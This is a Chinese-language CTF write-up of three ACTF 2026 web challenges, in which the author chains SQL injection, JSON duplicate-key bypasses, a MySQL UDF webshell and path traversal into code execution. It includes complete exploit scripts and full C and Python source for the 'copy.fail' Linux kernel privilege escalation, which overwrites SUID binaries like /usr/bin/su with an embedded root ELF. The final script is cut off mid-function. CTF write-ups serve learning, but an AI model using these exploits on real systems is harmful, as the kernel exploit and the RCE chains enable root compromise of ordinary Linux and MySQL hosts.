文章

ACTF 2026 web 部分

CTF越来越没意思了,已经几乎纯AI了

AI越强就越要防AI,于是题目愈发变难,人类也无能为力,最后还是交给AI

至于人类何去何从?希腊奶

12307

Dockerfile

COPY --chmod=0600 --chown=root:root flag /flag
...
chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64

/flag 只有 root 能读,但/usr/bin/base64 被设成了 SUID root,因此目标是让服务端执行:/usr/bin/base64 /flag

打印链路在 services/print_spooler/worker.py

program = str(ticket.get("driverProgram", ""))
argument = str(ticket.get("driverArgument", ""))
...
value = run_driver(program, argument)

启动脚本里写了设备权限:

{
  "profile-delta-closeout": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/base64"]
  },
  "profile-north-closeout": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/printf"]
  },
  "profile-baggage-preview": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/printf"]
  }
}

只有 profile-delta-closeout 能跑 /usr/bin/base64。在 services/fixtures/railway_business.json 里,这个 profile 对应 HGH 的设备 PR-HGH-042

{
  "deviceRef": "PR-HGH-042",
  "stationCode": "HGH",
  "deviceClass": "counter-layout",
  "codec": "settlement-filter",
  "enabled": 1,
  "driverProfile": "profile-delta-closeout"
}

所以需要走到 HGH 的 trusted settlement,把打印计划改成:

{
  "driverProgram": "/usr/bin/base64",
  "driverArgument": "/flag"
}

services/station_portal/app.py/api/station-office/fares/reprice中,tariffScope 里的 legacy-rank 会把 expr 直接拼进 ORDER BY

def fare_scope_expression(scope):
    ...
    if scope.get("mode") == "legacy-rank":
        return str(scope.get("expr", "ticket_no"))[:240]
sql = (
    "SELECT ticket_no,station_code,status FROM ticket_index "
    "WHERE station_code IN (%s,'BJP') "
    f"ORDER BY {scope} LIMIT 1"
)

后面根据第一条记录的 ticket_no 返回不同的 bucket

bucket = "north-window" if row and str(row.get("ticket_no", "")).startswith("T-BJP-") else "local-window"

因此可以布尔盲注拿 station_claim_artifacts.claim_salt,构造:

CASE WHEN (
  ASCII(SUBSTRING(
    (SELECT claim_salt FROM station_claim_artifacts WHERE order_id='xxx' LIMIT 1),
    2,1
  )) > 77
) THEN (station_code='BJP') ELSE (station_code='HGH') END DESC

返回 north-window 说明条件为真,返回 local-window 说明条件为假

然后在 services/receipt_signer/app.py中:

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

first_wins_object 会保留重复键第一次出现的值,普通 json.loads 会保留最后一次出现的值

校验时用的是 public_view

checks = {
    "batchId": batch_id,
    "orderId": order["order_id"],
    "stationCode": order["station_code"],
    "templateDigest": template_digest,
    "routeName": route_name,
    "ledgerRef": str((boarding_channel or {}).get("ledgerRef", "")),
    "printProfile": "counter-copy",
    "printer": "thermal-standard",
}
for key, expected_value in checks.items():
    if str(public_view.get(key, "")) != str(expected_value):
        return None, ["partner_receipt_review"]

但生成打印计划时用的是 render_view

print_plan = {
    "profile": str(render_view.get("printProfile", "counter-copy"))[:64],
    "printer": str(render_view.get("printer", "thermal-standard"))[:64],
    "prefix": str(render_view.get("prefix", "reconciliation"))[:48],
    "cell": str(render_view.get("cell", "receipt"))[:48],
    "ledgerRef": checks["ledgerRef"],
    "boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
    "driverProgram": str(render_view.get("driverProgram", ""))[:160],
    "driverArgument": str(render_view.get("driverArgument", ""))[:160],
}

这里可以直接塞重复键,前面的键负责过检查,后面的键负责控制渲染结果

漏洞有了,后面需要找一条能把恶意 print_plan 送进 PR-HGH-042 的路径

可以直接走 HGH 这一条线,相关的 trusted route、layout、device 都已经在配置里给了。看 services/ticketing_api/app.pyG7608business 初始座位数是 0:

{
    "id": "G7608",
    ...
    "stationCode": "HGH",
    "initial": {"business": 0, "first": 4, "second": 18},
}

这样创建订单之后就会进 waitlist

先调用:

POST /api/mobile/identity/continue

services/sso_gateway/server.js 这里只做了很弱的字符串判断:

const partnerOk = metadata.text.includes("railway-partner") || metadata.text.includes("PassengerIdentityProvider");
const audienceOk = tagValue(assertion.text, "Audience") === "12307" || assertion.text.includes("mobile-passenger");
const nameOk = Boolean(tagValue(assertion.text, "NameID")) || assertion.text.includes("PassengerID");
const relayOk = relay.text.includes("continue") || relay.text.includes("seat-hold");

发包:

{
  "partnerMetadata": "railway-partner compatBinding",
  "relayState": ["continue"],
  "assertion": "<Audience>12307</Audience><NameID>pwn</NameID>",
  "passenger": "pwn",
  "partnerId": "mobile-passenger",
  "stationCode": "HGH",
  "trustLevel": ["mobile", "partner", "settlement"]
}

然后调用:

POST /api/mobile/orders/hold
{"trainId":"G7608","seatClass":"business","holdMode":"waitlist"}

这个请求会先经过 edge_gateway,它会再触发一次 continuation 检查,把 session 设置 complete,然后返回 waitlist_session

接着创建订单:

POST /api/mobile/orders
{"trainId":"G7608","seatClass":"business","passenger":"pwn"}

拿到 orderId 之后,还要把 trusted settlement 用到的几项 Redis 状态准备好

先写站务公告:

POST /api/desk/notices

proxyHint 写成:

X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27

然后调用:

POST /api/desk/imports/health

参数:

{
  "stationCode": "HGH",
  "adapter": "station-partner-feed",
  "target": "rail-cache://redis/partner/metadata?stationCode=HGH",
  "payload": "sync"
}

services/station_import/app.py 里会写入:

  • rail:interline:lane:HGH

  • rail:board:profile:HGH

  • rail:partner:jwks:HGH

随后连接:

GET /api/connect/boarding?stationCode=HGH

按顺序发三条 websocket 消息:

{"type":"boarding.hello","channel":"<waitlist_session 或其前8位>"}
{"type":"boarding.bind","topic":"seat-consist","trainId":"G7608","seatClass":"business"}
{"type":"boarding.confirm","orderId":"<orderId>","stationCode":"HGH","epoch":"1"}

服务端会返回 ledgerRef,同时在 Redis 写 rail:ledger:channel:<orderId>

之后开始盲注 claim_salt。爆出来以后,本地算:

claim_digest = sha256(f"{orderId}|G7608|HGH|T-HGH-7608-019|{claim_salt}")
claim_proof = f"CP-{claim_salt}-{claim_digest[:12]}"

再调用:

POST /api/desk/tickets/adjust

传:

{
  "ticketNo": "T-HGH-7608-019",
  "claimProof": "算出来的值",
  "memo": "{\"stationCode\":\"HGH\",\"channel\":\"fare-desk\",\"lineItems\":{\"reason\":\"FARE-91\",\"layout\":\"folio-grid-27\",\"device\":\"PR-HGH-042\",\"enabled\":true}}",
  "delta": 1
}

这个 memo 要匹配 services/fixtures/railway_business.json 里 HGH 的策略:

"claim": {
  "reason": "FARE-91",
  "channel": "fare-desk"
},
"layout": {
  "cell": "receipt",
  "device": "PR-HGH-042"
}

然后再打一遍导入:

POST /api/desk/imports/health

参数:

{
  "stationCode": "HGH",
  "adapter": "station-desk-ledger",
  "target": "rail-cache://redis/desk-ledger?orderId=<orderId>&stationCode=HGH",
  "payload": "apply"
}

这里会写入:

UPDATE waitlist_entries SET sampled=1 ...
 UPDATE station_profiles SET batch_open=1, renderer_profile=..., signer_route=...
 INSERT INTO tariff_exception_claims ...

打完这个 station-desk-ledger 之后,数据库里会多出三处变化:

  • waitlist_entries.sampled=1,对应 fare_sample_review

  • station_profiles.batch_open=1renderer_profile=folio-grid-27signer_route=delta-window-27,对应 station_profile_review

  • tariff_exception_claims 里多出一条 PR-HGH-042 的记录,后面的 enterprise-clearing 会用到

这时候还差 rail:layout:entitlement:<orderId>,这项是在后面的 receipts/prepare 里写进 Redis 的

接下来调用:

POST /api/corporate/reconciliation

defer=true,先只创建 batch:

{
  "orderId": "<orderId>",
  "stationCode": "HGH",
  "batchId": "<batchId>",
  "reportType": "carrier-closeout",
  "defer": true,
  "data": {"carrier": "exploit"}
}

然后构造恶意 carrierSeal,payload 的关键内容如下:

{
  "batchId":"...",
  "orderId":"...",
  "stationCode":"HGH",
  "templateDigest":"...",
  "routeName":"delta-window-27",
  "ledgerRef":"...",
  "printProfile":"counter-copy",
  "printer":"thermal-standard",
  "printProfile":"clearing-batch",
  "printer":"line-printer",
  "prefix":"reconciliation",
  "cell":"receipt",
  "driverProgram":"/usr/bin/base64",
  "driverArgument":"/flag"
}

前面的 printProfileprinter 用来过检查,后面的 printProfileprinter 会在 render_view 里生效,这样 layout_enabled 这一段条件也能满足:

layout_enabled = (
    not reasons
    and receipt["render_grant"] == station_cfg.get("grantCode")
    and print_plan.get("profile") == "clearing-batch"
    and print_plan.get("printer") == "line-printer"
)

再配合:

"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"

最后就会进入 PR-HGH-042 -> profile-delta-closeout -> /usr/bin/base64 /flag 这条链

这个 seal 用 POL-HGH-TRUSTED 对应的密钥签名,然后提交:

POST /api/corporate/receipts/prepare

这个请求会先经过 enterprise_gateway,代码里有这样一段:

await mergeLayoutClaim(orderId, stationCode);

enterprise_gateway 会把这次请求转到 station_importenterprise-clearing。那边会调用 activate_layout_claim(order_id, station_code),执行后 Redis 里会出现:

redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")

这样 layout_review 这一项也过了

另外还有一个细节,services/waitlist_push/server.js 里:

await redisCommand("SET", `rail:fulfillment:epoch:${orderId}`, "boarding", "EX", "7");

这个 key 只活 7 秒。远端盲注 claim_salt 很慢,前面打过一次 waitlist/pulse 的话,等到真正调度结算时这个状态已经过期了,最后只会得到:

{
  "ready": false,
  "reasons": ["review_required"],
  "body": "Reconciliation ... [layout-pending]"
}

所以在盲注完成之后,要重新打一遍:

POST /api/mobile/waitlist/pulse
{"orderId":"<orderId>"}

最后调度:

POST /api/corporate/settlement/schedule
{"batchId":"<batchId>"}

再轮询:

GET /api/corporate/reconciliation/<batchId>

成功时返回:

{
  "batchId":"B55EEFD108D",
  "report":{
    "batchId":"B55EEFD108D",
    "ready":true,
    "reasons":[],
    "body":"Reconciliation O92G72UK7HJ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9\n",
    "finishedAt":1778377062
  }
}

末尾这一段 base64 解码就是 flag:

ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}

GoMySQL

二血

首先对 /calc 提交的 expression 做测试,可以确认该参数被拼接进入了 SQL 语句。直接提交包含关键字的载荷可以观察到过滤响应,进一步测试后可以确认这里不仅存在注入,而且后端允许分号分隔的多语句执行。题目对输入做了一层黑名单过滤,至少会拦截 SELECTUPDATEFLAGSCHEMA@@_ 等字面内容

由于目标数据库支持 execute immediate,可以先把真正要执行的 SQL 编码为十六进制,再通过多语句触发执行。验证脚本如下:

import binascii
import urllib.parse
import urllib.request
​
base = "http://target/calc"
sql = "show databases"
payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
data = urllib.parse.urlencode({"expression": payload}).encode()
print(urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore"))

利用这一点,可以稳定执行任意 SQL 而不触发黑名单。后续先做环境确认,例如:

show databases
select database()
select load_file('/etc/passwd')
select @@plugin_dir

可以确认当前库为 testdbload_file 可用,且能够获取 MySQL 的插件目录。到这一步,题目的重点已经不再是业务数据,而是如何将 SQL 执行能力扩展为系统命令执行

这里采用 UDF 方案。将预先编译好的 sys_eval 动态库以十六进制形式写入 plugin_dir,随后删除并重建同名函数即可。核心过程如下:

def exec_sql(sql):
    expr = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
    data = urllib.parse.urlencode({"expression": expr}).encode()
    return urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore")
​
udf_hex = open("lib_mysqludf_sys_so.hex.txt", "r", encoding="utf-8").read().strip()
plugin_dir = "/usr/lib/mysql/plugin/"
udf_name = "libudf_x.so"
​
exec_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
exec_sql("drop function if exists sys_eval")
exec_sql(f"create function sys_eval returns string soname '{udf_name}'")
print(exec_sql("select sys_eval('id') as x"))

验证结果可以得到 uid=100(mysql) gid=101(mysql),说明已经获得 mysql 用户命令执行。继续检查目标文件权限:

select sys_eval('ls -l /flag; stat /flag 2>/dev/null || true')

可见 /flagroot:root 且权限为 600,因此 mysql 用户无法直接读取

本地提权部分使用 copy.fail

上传两个预先准备好的 ELF 二进制:一个是 copyfail_patch,负责利用漏洞对 SUID 文件实施定点覆盖;另一个是 flagcat,逻辑仅为 setuid(0); setgid(0); open("/flag"); write(1, ...)。二者均以十六进制字节流形式上传到 /tmp 并赋予执行权限:

patch_hex = open("copyfail_patch.hex.txt", "r", encoding="utf-8").read().strip()
flagcat_hex = open("flagcat.hex.txt", "r", encoding="utf-8").read().strip()
​
exec_sql(f"select 0x{patch_hex} into dumpfile '/tmp/cfpatch_x'")
exec_sql(f"select 0x{flagcat_hex} into dumpfile '/tmp/flagcat_x'")
exec_sql("select sys_eval('chmod 755 /tmp/cfpatch_x /tmp/flagcat_x')")

copyfail_patch.c

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
​
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
​
static void die(const char *msg) {
    perror(msg);
    exit(1);
}
​
static void do_patch(int fd, size_t off, const unsigned char *chunk, size_t len) {
    int sfd, afd, pipes[2];
    struct sockaddr_alg sa;
    unsigned char key[40] = {
        0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10
    };
    unsigned char payload[8];
    struct msghdr msg;
    struct iovec iov;
    unsigned char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)];
    struct cmsghdr *cmsg;
    uint32_t zero = 0;
    uint32_t assoclen = 8;
    struct {
        uint32_t ivlen;
        unsigned char iv[16];
    } ivmsg;
    loff_t splice_off = 0;
    size_t want;
    unsigned char *drain;
​
    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "aead");
    strcpy((char *)sa.salg_name, "authencesn(hmac(sha256),cbc(aes))");
​
    sfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (sfd < 0) die("socket");
    if (bind(sfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind");
    if (setsockopt(sfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) die("setsockopt key");
    if (setsockopt(sfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, &zero, sizeof(zero)) < 0) {
        die("setsockopt authsize");
    }
​
    afd = accept(sfd, NULL, 0);
    if (afd < 0) die("accept");
​
    memset(&msg, 0, sizeof(msg));
    memset(&ivmsg, 0, sizeof(ivmsg));
    ivmsg.ivlen = 16;
    memset(payload, 0, sizeof(payload));
    memset(payload, 'A', 4);
    memcpy(payload + 4, chunk, len);
​
    iov.iov_base = payload;
    iov.iov_len = 4 + len;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);
​
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_OP;
    cmsg->cmsg_len = CMSG_LEN(4);
    memset(CMSG_DATA(cmsg), 0, 4);
​
    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(ivmsg));
    memcpy(CMSG_DATA(cmsg), &ivmsg, sizeof(ivmsg));
​
    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
    cmsg->cmsg_len = CMSG_LEN(4);
    memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
​
    if (sendmsg(afd, &msg, MSG_MORE) < 0) die("sendmsg");
    if (pipe(pipes) < 0) die("pipe");
    if (splice(fd, &splice_off, pipes[1], NULL, off + 4, 0) < 0) die("splice file->pipe");
    if (splice(pipes[0], NULL, afd, NULL, off + 4, 0) < 0) die("splice pipe->sock");
​
    want = off + 8;
    drain = malloc(want);
    if (drain == NULL) die("malloc drain");
    (void)recv(afd, drain, want, 0);
    free(drain);
​
    close(pipes[0]);
    close(pipes[1]);
    close(afd);
    close(sfd);
}
​
int main(int argc, char **argv) {
    FILE *fp;
    int fd;
    long sz;
    unsigned char *buf;
    size_t i;
​
    if (argc != 3) {
        fprintf(stderr, "usage: %s <target> <payload>\n", argv[0]);
        return 1;
    }
​
    fp = fopen(argv[2], "rb");
    if (fp == NULL) die("fopen payload");
    if (fseek(fp, 0, SEEK_END) != 0) die("fseek");
    sz = ftell(fp);
    if (sz < 0) die("ftell");
    if (fseek(fp, 0, SEEK_SET) != 0) die("fseek");
​
    buf = malloc((size_t)sz);
    if (buf == NULL) die("malloc");
    if (fread(buf, 1, (size_t)sz, fp) != (size_t)sz) die("fread");
    fclose(fp);
​
    fd = open(argv[1], O_RDONLY);
    if (fd < 0) die("open target");
​
    for (i = 0; i < (size_t)sz; i += 4) {
        size_t chunk_len = (size_t)sz - i;
        if (chunk_len > 4) {
            chunk_len = 4;
        }
        do_patch(fd, i, buf + i, chunk_len);
    }
​
    close(fd);
    free(buf);
    return 0;
}
​

随后选择 /usr/bin/passwd 作为目标 SUID 程序实施覆盖

print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql(\"select sys_eval('/tmp/cfpatch_x /usr/bin/passwd /tmp/flagcat_x')\"))
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/usr/bin/passwd 2>&1 | head -n 20')"))

第一次 od 用于确认原始 ELF 头,执行 patch 后再次查看可以看到头部已经变化,说明 copy.fail 已经成功将目标 SUID 文件替换为自定义 payload。最后执行 /usr/bin/passwd,即可直接以 root 权限输出 /flag

EXP如下(需要准备各个hex.txt文件):

import argparse
import binascii
import html
import pathlib
import random
import re
import string
import urllib.parse
import urllib.request
​
ROOT = pathlib.Path(__file__).resolve().parent
​
def rand_suffix(n=6):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))
​
class Exploit:
    def __init__(self, url):
        clean = url.rstrip("/")
        self.calc = clean if clean.endswith("/calc") else clean + "/calc"
​
    def raw(self, payload):
        data = urllib.parse.urlencode({"expression": payload}).encode()
        req = urllib.request.Request(self.calc, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
        return urllib.request.urlopen(req, timeout=120).read().decode("utf-8", "ignore")
​
    def run_sql(self, sql):
        payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
        return self.raw(payload)
​
    def sys_eval(self, cmd):
        cmd = cmd.replace("\\", "\\\\").replace("'", "''")
        return self.run_sql(f"select sys_eval('{cmd}') as x")
​
    def rebuild_sys_eval(self):
        udf_hex = (ROOT / "lib_mysqludf_sys_so.hex.txt").read_text().strip()
        udf_name = "libudf_" + rand_suffix() + ".so"
        plugin_dir = "/usr/lib/mysql/plugin/"
        self.run_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
        self.run_sql("drop function if exists sys_eval")
        self.run_sql(f"create function sys_eval returns string soname '{udf_name}'")
        print(self.run_sql("select sys_eval('id') as x"))
​
    def get_flag(self):
        suffix = rand_suffix()
        patch_hex = (ROOT / "copyfail_patch.hex.txt").read_text().strip()
        flagcat_hex = (ROOT / "flagcat.hex.txt").read_text().strip()
        patch = f"/tmp/cfpatch_{suffix}"
        flagcat = f"/tmp/flagcat_{suffix}"
        self.run_sql(f"select 0x{patch_hex} into dumpfile '{patch}'")
        self.run_sql(f"select 0x{flagcat_hex} into dumpfile '{flagcat}'")
        self.sys_eval(f"chmod 755 {patch} {flagcat}")
        print(self.sys_eval("ls -l /flag; stat /flag 2>/dev/null || true"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval(f"{patch} /usr/bin/passwd {flagcat}"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval("/usr/bin/passwd 2>&1 | head -n 20"))
​
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True)
    args = parser.parse_args()
    exp = Exploit(args.url)
    exp.rebuild_sys_eval()
    exp.get_flag()
​
if __name__ == "__main__":
    main()

最终读取到的 flag 为:

ACTF{y0u1_sqI_Y0ur_Go!!!!!_dxqmcFIr4ZCpo5OeNqSL}

Real DLsite

三血

先登录,默认管理员口令:

admin / 123456

然后创建一个 fs drive,把根路径配成穿越:

{
  "name": "rootish",
  "enabled": true,
  "type": "fs",
  "config": "{\\\\"path\\\\":\\\\"../../../../\\\\"}"
}

初始化并 reload 之后,就可以通过 rootish/... 访问容器根目录。关键可写位置有两个:

/app/config.yml
/app/data/script-drives/

后台的 script-eval 可以直接执行 JS 并调用 drive.Save 写文件

var tf = newTempFile();
tf.Write(newBytes("PING"));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, "rootish/app/ping.txt", tf.Size(), true, tf);
log("saved=" + e.Path());

修改 /app/config.yml,打开 thumbnail 的 shell handler :

    - type: shell
      tags: pwn
      file-types: txt
      config:
        shell: /bin/sh
        mime-type: text/plain
        write-content: "1"
        max-size: "-1"
        timeout: 10m

同时设置 thumbnail.handlersMapping

{
  "thumbnail.handlersMapping": "pwn:rootish/tmp/*.txt"
}

写一个恶意 script drive,让它在生成 thumbnail 时 panic,这样便会重启,重读 config.yml

写入 /app/data/script-drives/evil.js

/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
  return {
    meta: function (ctx) { return {}; },
    get: function (ctx, path) {
      if (path === '' || path === '/') {
        return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
      }
      if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
      return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
    },
    list: function (ctx, path) {
      return [this.get(ctx, 'x.txt')];
    },
    getReader: function (ctx, entry, start, size) {
      return 123;
    }
  };
});

然后创建 boom

{
  "name": "boom",
  "enabled": true,
  "type": "script",
  "config": "{\\\\"script\\\\":\\\\"evil\\\\"}"
}

初始化完成后访问:

/new/thumbnail/boom/x.txt?_k=...

触发 panic

之后把命令写进 rootish/tmp/cmd.txt,再访问:

/new/thumbnail/rootish/tmp/cmd.txt?_k=...

即可获得稳定的 app 用户 RCE:

uid=1000(app) gid=1000(app) groups=1000(app)

接下来需要提权,使用 copy.fail 修改su

并且存在一个 root cron,会周期性调用 /usr/bin/su

*/5 * * * * root APP_SECRET="$(cat /run/secrets/www)" exec su -s /bin/bash -p www-data -c 'StorageBox put /var/www/html/db.sqlite'

使用 copy.fail 修改su为我们控制的elf即可

EXP:

#!/usr/bin/env python3
import argparse
import json
import time
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_USER = "admin"
DEFAULT_PASSWORD = "123456"
ROOTISH = "rootish"
BOOM = "boom"
CMD_PATH = f"{ROOTISH}/tmp/cmd.txt"
THUMB_MAPPING = f"pwn:{ROOTISH}/tmp/*.txt"

# Minimal ELF executed as root by cron's `su` call.
# Behavior:
#   /bin/sh -c 'cat /root/0-0/flag>/app/data/local/test/f;chmod 644 /app/data/local/test/f'
ROOT_WRITER_ELF_HEX = (
    "7f454c4602010100000000000000000002003e00010000007800400000000000"
    "4000000000000000300100000000000000000000400038000100400003000200"
    "0100000007000000780000000000000078004000000000007800400000000000"
    "a000000000000000a00000000000000008000000000000004831d2488d357600"
    "0000488d3d1500000048c7c03b0000000f054831ff48c7c03c0000000f052f62"
    "696e2f7368002d6300636174202f726f6f742f302d302f666c61673e2f617070"
    "2f646174612f6c6f63616c2f746573742f663b63686d6f6420363434202f6170"
    "702f646174612f6c6f63616c2f746573742f6600900f1f009e00400000000000"
    "a600400000000000a9004000000000000000000000000000002e736873747274"
    "6162002e74657874000000000000000000000000000000000000000000000000"
    "0000000000000000000000000000000000000000000000000000000000000000"
    "0000000000000000000000000b00000001000000070000000000000078004000"
    "000000007800000000000000a000000000000000000000000000000008000000"
    "0000000000000000000000000100000003000000000000000000000000000000"
    "0000000018010000000000001100000000000000000000000000000001000000"
    "000000000000000000000000"
)

EVIL_SCRIPT = r"""/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
  return {
    meta: function (ctx) { return {}; },
    get: function (ctx, path) {
      if (path === '' || path === '/') {
        return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
      }
      if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
      return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
    },
    list: function (ctx, path) {
      return [this.get(ctx, 'x.txt')];
    },
    getReader: function (ctx, entry, start, size) {
      return 123;
    }
  };
});
"""

SHELL_HANDLER_BLOCK = """    - type: shell
      tags: pwn
      file-types: txt
      config:
        shell: /bin/sh
        mime-type: text/plain
        write-content: "1"
        max-size: "-1"
        timeout: 10m
"""

COPY_FAIL_PATCH_CMD = r"""
python3 - <<'PY'
import os
import socket

hexs = """ + repr(ROOT_WRITER_ELF_HEX) + r"""
blob = bytes.fromhex(hexs)

def d(x):
    return bytes.fromhex(x)

def poke(path, blob):
    fd = os.open(path, 0)
    h = 279
    for off in range(0, len(blob), 4):
        c = blob[off:off + 4]
        a = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
        a.setsockopt(h, 1, d("0800010000000010" + "0" * 64))
        a.setsockopt(h, 5, None, 4)
        u, _ = a.accept()
        z = b"\\x00"
        u.sendmsg(
            [b"A" * 4 + c],
            [(h, 3, z * 4), (h, 2, b"\\x10" + z * 19), (h, 4, b"\\x08" + z * 3)],
            32768,
        )
        r, w = os.pipe()
        os.splice(fd, w, off + 4, offset_src=0)
        os.splice(r, u.fileno(), off + 4)
        try:
            u.recv(8 + off)
        except Exception:
            pass
    print("PATCHED_SU", len(blob), flush=True)

poke("/usr/bin/su", blob)
PY
"""

def normalize_base(base):
    base = base.rstrip("/")
    if base.endswith("/new"):
        api_base = base
        root_base = base[:-4]
    else:
        api_base = base + "/new"
        root_base = base
    return api_base, root_base

class Exploit:
    def __init__(self, api_base, root_base, user, password, verbose=True):
        self.api_base = api_base
        self.root_base = root_base
        self.user = user
        self.password = password
        self.token = None
        self.verbose = verbose

    def log(self, *parts):
        if self.verbose:
            print("[*]", *parts, flush=True)

    def req(self, path, method="GET", data=None, headers=None, timeout=30):
        if headers is None:
            headers = {}
        if data is not None and not isinstance(data, (bytes, bytearray)):
            data = data.encode()
        r = urllib.request.Request(self.api_base + path, data=data, headers=headers, method=method)
        try:
            with urllib.request.urlopen(r, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "ignore"), resp.status
        except urllib.error.HTTPError as e:
            return e.read().decode("utf-8", "ignore"), e.code

    def api(self, path, method="GET", data=None, ctype="application/json", timeout=30):
        headers = {"Authorization": self.token}
        if data is not None:
            headers["Content-Type"] = ctype
        if ctype == "application/json" and data is not None and not isinstance(data, str):
            data = json.dumps(data)
        return self.req(path, method=method, data=data, headers=headers, timeout=timeout)

    def auth(self):
        last_err = None
        for attempt in range(10):
            self.log(f"初始化 token,第 {attempt + 1} 次")
            body, status = self.req("/auth/init", method="POST")
            if status != 200 or not body.strip():
                last_err = f"/auth/init 异常: HTTP {status} {body!r}"
                time.sleep(1)
                continue
            try:
                self.token = json.loads(body)["token"]
            except Exception as e:
                last_err = f"/auth/init 解析失败: {body!r} ({e})"
                time.sleep(1)
                continue

            self.log("登录 go-drive 管理后台")
            body, status = self.req(
                "/auth/login",
                method="POST",
                data=json.dumps({"username": self.user, "password": self.password}),
                headers={"Authorization": self.token, "Content-Type": "application/json"},
            )
            if status == 200:
                return
            last_err = f"登录失败: HTTP {status} {body}"
            time.sleep(1)
        raise RuntimeError(last_err or "认证失败")

    def get_entry(self, path):
        body, status = self.api("/entry/" + path)
        if status != 200:
            raise RuntimeError(f"获取 entry 失败: {path} -> HTTP {status} {body}")
        return json.loads(body)

    def get_content(self, path):
        entry = self.get_entry(path)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/content/" + path + "?_k=" + urllib.parse.quote(key, safe=""))
        if status != 200:
            raise RuntimeError(f"读取内容失败: {path} -> HTTP {status} {body}")
        return body

    def save_file(self, path, content):
        js = f"""
var tf = newTempFile();
tf.Write(newBytes({json.dumps(content)}));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, {json.dumps(path)}, tf.Size(), true, tf);
log('saved=' + e.Path());
"""
        body, status = self.api("/admin/jobs/script-eval", method="POST", data=js, ctype="text/plain", timeout=60)
        if status != 200:
            raise RuntimeError(f"写文件失败: {path} -> HTTP {status} {body}")
        return body

    def ensure_rootish(self):
        self.log("确保 rootish drive 存在")
        desired = {
            "name": ROOTISH,
            "enabled": True,
            "type": "fs",
            "config": "{\\"path\\":\\"../../../../\\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{ROOTISH}", method="PUT", data=desired)
        self.api(f"/admin/drive/{ROOTISH}/init-config", method="POST")
        self.api(f"/admin/drive/{ROOTISH}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{ROOTISH}/app/config.yml")

    def ensure_shell_handler(self):
